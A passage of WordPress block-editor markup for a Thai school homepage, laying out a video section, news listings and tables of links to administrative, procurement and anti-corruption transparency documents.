{\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer 